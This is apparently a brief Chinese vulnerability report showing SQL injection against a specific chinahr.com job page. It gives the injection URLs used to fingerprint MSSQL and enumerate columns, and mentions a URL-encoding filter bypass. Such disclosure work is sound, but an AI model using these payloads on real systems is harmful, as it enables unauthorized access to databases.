http://pages.chinahr.com/2012/bj/sdic_0531/jobs.asp?orgid=200309120019360005
存在问题链接:
首先加个单引号,
http://pages.chinahr.com/2012/bj/sdic_0531/jobs.asp?orgid=200309120019360005’
可以看到,页面空白,我们右键查看源代码。。
可以看到,如下错误信息,知道是mssql。。
http://pages.chinahr.com/2012/bj/sdic_0531/jobs.asp?orgid=200309120019360005 and @@version=1
可以看到,版本为2008.
用工具注入的时候出错。。在这里测试过滤了()..
可以用url编码绕过。这里不绕过,我们直接来猜字段:
http://pages.chinahr.com/2012/bj/sdic_0531/jobs.asp?orgid=200309120019360005 having 1=1
http://pages.chinahr.com/2012/bj/sdic_0531/jobs.asp?orgid=200309120019360005 group by job_id having 1=1
就不一个个去爆了,修补就好。。